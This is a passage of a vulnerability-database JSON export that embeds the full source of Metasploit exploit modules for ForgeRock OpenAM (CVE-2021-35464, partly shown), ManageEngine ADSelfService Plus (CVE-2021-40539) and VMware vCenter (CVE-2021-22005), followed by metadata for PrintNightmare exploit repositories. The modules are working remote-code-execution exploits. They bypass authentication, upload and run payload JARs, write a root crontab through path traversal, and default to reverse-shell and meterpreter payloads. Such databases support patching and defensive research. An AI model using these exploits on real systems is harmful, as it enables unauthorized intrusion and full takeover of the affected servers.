ARCH_CMD,\n 'Type' => :unix_cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_python_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :linux_dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 1,\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n register_options([\n Opt::RPORT(8080),\n OptString.new('TARGETURI', [true, 'Base path', '/openam'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),\n 'vars_post' => {\n 'jato.pageSession' => Base64.urlsafe_encode64(rand_text_alphanumeric(6..13))\n }\n )\n if res.nil?\n CheckCode::Unknown(\"The target server didn't respond!\")\n elsif res.code == 302 && res.headers['Location']&.end_with?('/base/AMInvalidURL')\n CheckCode::Appears\n else\n CheckCode::Safe\n end\n end\n\n def execute_command(cmd, _opts = {})\n cmd_encapsulated = \"bash -c {echo,#{Rex::Text.encode_base64(cmd)}}|{base64,-d}|bash\"\n ysoserial_payload = Msf::Util::JavaDeserialization.ysoserial_payload('Click1', cmd_encapsulated, modified_type: 'none')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/oauth2/..;/ccversion/Version'),\n 'vars_post' => {\n 'jato.pageSession' => Base64.urlsafe_encode64(\"\\x00\" + ysoserial_payload)\n }\n )\n unless res && res.code == 302\n fail_with(Failure::UnexpectedReply, \"Failed to execute command: #{cmd}\")\n end\n print_good(\"Successfully executed command: #{cmd}\")\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n case target['Type']\n when :unix_cmd\n execute_command(payload.encoded)\n when :linux_dropper\n execute_cmdstager\n end\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/cve_2021_35464_forgerock_openam.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-03T21:26:07", "description": "This module exploits CVE-2021-40539, a REST API authentication bypass vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and execute it as the user running ADSelfService Plus - which is SYSTEM if started as a service.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-24T01:05:09", "type": "metasploit", "title": "ManageEngine ADSelfService Plus CVE-2021-40539", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-40539"], "modified": "2021-11-24T16:44:59", "id": "MSF:EXPLOIT-WINDOWS-HTTP-MANAGEENGINE_ADSELFSERVICE_PLUS_CVE_2021_40539-", "href": "https://www.rapid7.com/db/modules/exploit/windows/http/manageengine_adselfservice_plus_cve_2021_40539/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::Remote::Java::HTTP::ClassLoader # TODO: Refactor this\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'ManageEngine ADSelfService Plus CVE-2021-40539',\n 'Description' => %q{\n This module exploits CVE-2021-40539, a REST API authentication bypass\n vulnerability in ManageEngine ADSelfService Plus, to upload a JAR and\n execute it as the user running ADSelfService Plus - which is SYSTEM if\n started as a service.\n },\n 'Author' => [\n # Discovered by unknown threat actors\n 'Antoine Cervoise', # Independent analysis and RCE\n 'Wilfried B\u00e9card', # Independent analysis and RCE\n 'mr_me', # keytool classloading technique\n 'wvu' # Initial analysis and module\n ],\n 'References' => [\n ['CVE', '2021-40539'],\n ['URL', 'https://www.manageengine.com/products/self-service-password/kb/how-to-fix-authentication-bypass-vulnerability-in-REST-API.html'],\n ['URL', 'https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis'],\n ['URL', 'https://www.synacktiv.com/en/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html'],\n ['URL', 'https://github.com/synacktiv/CVE-2021-40539/blob/main/exploit.py']\n ],\n 'DisclosureDate' => '2021-09-07',\n 'License' => MSF_LICENSE,\n 'Platform' => 'java',\n 'Arch' => ARCH_JAVA,\n 'Privileged' => false, # true if ADSelfService Plus is run as a service\n 'Targets' => [\n ['Java Dropper', {}]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 8888\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Path traversal for auth bypass', '/./'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'vars_post' => {\n 'methodToCall' => 'previewMobLogo'\n }\n )\n\n unless res\n return CheckCode::Unknown('Target failed to respond to check.')\n end\n\n unless res.code == 200 && res.body.match?(%r{mobLogo.*/temp/tempMobPreview\\.jpeg})\n return CheckCode::Safe('Failed to bypass REST API authentication.')\n end\n\n CheckCode::Vulnerable('Successfully bypassed REST API authentication.')\n end\n\n def exploit\n upload_payload_jar\n execute_payload_jar\n end\n\n def upload_payload_jar\n print_status(\"Uploading payload JAR: #{jar_filename}\")\n\n jar = payload.encoded_jar\n jar.add_file(\"#{class_name}.class\", constructor_class) # Hack, tbh\n\n form = Rex::MIME::Message.new\n form.add_part('unspecified', nil, nil, 'form-data; name=\"methodToCall\"')\n form.add_part('yas', nil, nil, 'form-data; name=\"Save\"')\n form.add_part('smartcard', nil, nil, 'form-data; name=\"form\"')\n form.add_part('Add', nil, nil, 'form-data; name=\"operation\"')\n form.add_part(jar.pack, 'application/java-archive', 'binary',\n %(form-data; name=\"CERTIFICATE_PATH\"; filename=\"#{jar_filename}\"))\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/LogonCustomization'),\n 'ctype' => \"multipart/form-data; boundary=#{form.bound}\",\n 'data' => form.to_s\n )\n\n unless res&.code == 404\n fail_with(Failure::NotVulnerable, 'Failed to upload payload JAR')\n end\n\n # C:\\ManageEngine\\ADSelfService Plus\\bin (working directory)\n register_file_for_cleanup(jar_filename)\n\n print_good('Successfully uploaded payload JAR')\n end\n\n def execute_payload_jar\n print_status('Executing payload JAR')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/RestAPI/Connection'),\n 'vars_post' => {\n 'methodToCall' => 'openSSLTool',\n 'action' => 'generateCSR',\n # https://docs.oracle.com/javase/8/docs/technotes/tools/unix/keytool.html\n 'VALIDITY' => \"#{rand(1..365)} -providerclass #{class_name} -providerpath #{jar_filename}\"\n }\n )\n\n unless res&.code == 404\n fail_with(Failure::PayloadFailed, 'Failed to execute payload JAR')\n end\n\n print_good('Successfully executed payload JAR')\n end\n\n def jar_filename\n @jar_filename ||= \"#{rand_text_alphanumeric(8..16)}.jar\"\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/http/manageengine_adselfservice_plus_cve_2021_40539.rb", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-08-19T22:40:51", "description": "This module exploits a file upload in VMware vCenter Server's analytics/telemetry (CEIP) service to write a system crontab and execute shell commands as the root user. Note that CEIP must be enabled for the target to be exploitable by this module. CEIP is enabled by default.\n", "cvss3": {}, "published": "2021-10-06T21:43:57", "type": "metasploit", "title": "VMware vCenter Server Analytics (CEIP) Service File Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-22005"], "modified": "2021-10-20T19:16:46", "id": "MSF:EXPLOIT-LINUX-HTTP-VMWARE_VCENTER_ANALYTICS_FILE_UPLOAD-", "href": "https://www.rapid7.com/db/modules/exploit/linux/http/vmware_vcenter_analytics_file_upload/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'VMware vCenter Server Analytics (CEIP) Service File Upload',\n 'Description' => %q{\n This module exploits a file upload in VMware vCenter Server's\n analytics/telemetry (CEIP) service to write a system crontab and\n execute shell commands as the root user.\n\n Note that CEIP must be enabled for the target to be exploitable by\n this module. CEIP is enabled by default.\n },\n 'Author' => [\n 'George Noseevich', # Discovery\n 'Sergey Gerasimov', # Discovery\n 'VMware', # Initial PoC\n 'Derek Abdine', # Analysis\n 'wvu' # Analysis and exploit\n ],\n 'References' => [\n ['CVE', '2021-22005'],\n ['URL', 'https://www.vmware.com/security/advisories/VMSA-2021-0020.html'],\n ['URL', 'https://attackerkb.com/topics/15E0q0tdEZ/cve-2021-22005/rapid7-analysis'],\n ['URL', 'https://censys.io/blog/vmware-cve-2021-22005-technical-impact-analysis/'],\n ['URL', 'https://testbnull.medium.com/quick-note-of-vcenter-rce-cve-2021-22005-4337d5a817ee']\n ],\n 'DisclosureDate' => '2021-09-21',\n 'License' => MSF_LICENSE,\n 'Platform' => ['unix', 'linux'],\n 'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Unix Command',\n {\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Type' => :cmd,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'cmd/unix/reverse_perl_ssl'\n }\n }\n ],\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Type' => :dropper,\n 'DefaultOptions' => {\n 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'\n }\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'WfsDelay' => 60\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/'])\n ])\n end\n\n def check\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/level'),\n 'vars_get' => {\n '_c' => ''\n }\n )\n\n return CheckCode::Unknown unless res\n\n unless res.code == 200 && res.body == '\"FULL\"'\n return CheckCode::Safe('CEIP is not fully enabled.')\n end\n\n CheckCode::Appears('CEIP is fully enabled.')\n end\n\n def exploit\n print_status('Creating path traversal')\n\n # /var/log/vmware/analytics/prod/_c_i/\n unless write_file(rand_text_alphanumeric(8..16))\n fail_with(Failure::NotVulnerable, 'Failed to create path traversal')\n end\n\n print_good('Successfully created path traversal')\n\n print_status(\"Executing #{payload_instance.refname} (#{target.name})\")\n\n case target['Type']\n when :cmd\n execute_command(payload.encoded)\n when :dropper\n execute_cmdstager\n end\n\n print_warning(\"Please wait up to #{wfs_delay} seconds for a session\")\n end\n\n def execute_command(cmd, _opts = {})\n print_status(\"Writing system crontab: #{crontab_path}\")\n\n crontab_file = crontab(cmd)\n vprint_line(crontab_file)\n\n # /var/log/vmware/analytics/prod/_c_i/../../../../../../etc/cron.d/\n unless write_file(\"../../../../../../etc/cron.d/#{crontab_name}\", crontab_file)\n fail_with(Failure::PayloadFailed, 'Failed to write system crontab')\n end\n\n print_good('Successfully wrote system crontab')\n end\n\n def write_file(path, data = nil)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/analytics/telemetry/ph/api/hyper/send'),\n 'ctype' => 'application/json',\n 'vars_get' => {\n '_c' => '',\n '_i' => \"/#{path}\"\n },\n 'data' => data\n )\n\n return false unless res&.code == 201\n\n true\n end\n\n def crontab(cmd)\n # https://man7.org/linux/man-pages/man5/crontab.5.html\n <<~CRONTAB.strip\n * * * * * root rm -rf #{crontab_path} /var/log/vmware/analytics/prod/_c_i/\n * * * * * root #{cmd}\n CRONTAB\n end\n\n def crontab_path\n \"/etc/cron.d/#{crontab_name}.json\"\n end\n\n def crontab_name\n @crontab_name ||= rand_text_alphanumeric(8..16)\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/vmware_vcenter_analytics_file_upload.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "githubexploit": [{"lastseen": "2022-03-27T21:17:11", "description": "# PrintNightmare (CVE-2021-1675)\n\nThis Zeek script detects succe...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T16:44:24", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-27T16:56:12", "id": "3399B834-8492-5C0C-AA14-7F120BA37AF6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-18T14:37:24", "description": "# PrintNightmare - Windows Print Spooler RCE/LPE Vulnerability (...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-03T15:15:12", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-18T12:17:12", "id": "CD2BFDFF-9EBC-5C8F-83EC-62381CD9BCD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:13", "description": "## Kritische Sicherheitsl\u00fccke\n### PrintNightmare CVE-2021-1675, ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-02T07:30:52", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-08-05T03:00:36", "id": "0263BC36-BEB1-519B-965B-52D9E6AB116F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:32:50", "description": "# PrintNightmare\n\nHere is a project that will help to fight agai...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-28T07:55:42", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-09-15T06:40:48", "id": "DF28DCE7-CCFF-5653-81BA-719525BE09AD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:28:59", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-05T12:10:43", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2021-10-24T06:06:09", "id": "E7D3FB75-54DE-5CD8-83D6-438BFC7CFA74", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-07T23:15:44", "description": "# CVE-2021-1675-LPE-EXP\n**Simple LPE Exploit of CVE-2021-1675** ...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-01T09:00:31", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-07T15:32:16", "id": "64AAF745-D50D-575C-B3FF-A09072475502", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-22T08:28:18", "description": "# CVE-2021-1675 / CVE-2021-34527\n\nImpacket implementation of the...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-02-22T03:32:14", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-02-22T03:32:28", "id": "21F83D93-118D-50C7-A5C0-B2069237666E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T00:25:23", "description": "# It Was All A Dream\n\nA [CVE-2021-34527](https://msrc.microsoft....", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-05T20:13:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-23T19:20:20", "id": "0BB19334-D311-5464-B40B-7B27A0AD8825", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-30T19:52:51", "description": "# CVE-2021-34527 - PrintNightmare LPE (PowerShell)\n\n> Caleb Stew...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-07-02T12:10:49", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-34527"], "modified": "2022-03-30T10:57:52", "id": "B03B4134-B4C9-5B2D-BA55-EEEA540389F4", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-16T17:02:43", "description": "= Print Nightmare \u5206\u6790\u62a5\u544a\n:imagesdir: Figures\n:toc:\n:icons: font\n:f...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-22T10:49:30", "type": "githubexploit", "title": "Exploit for Improper Privilege Management in Microsoft", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527", "CVE-2021-1675"], "modified": "2022-03-16T09:18:03", "id": "F1B229EB-2178-53B9-839E-BA0B916376A2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-27T17:02:41", "description": "# PrintNightmare\n\nPython implementation for PrintNightmare (CVE-...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": 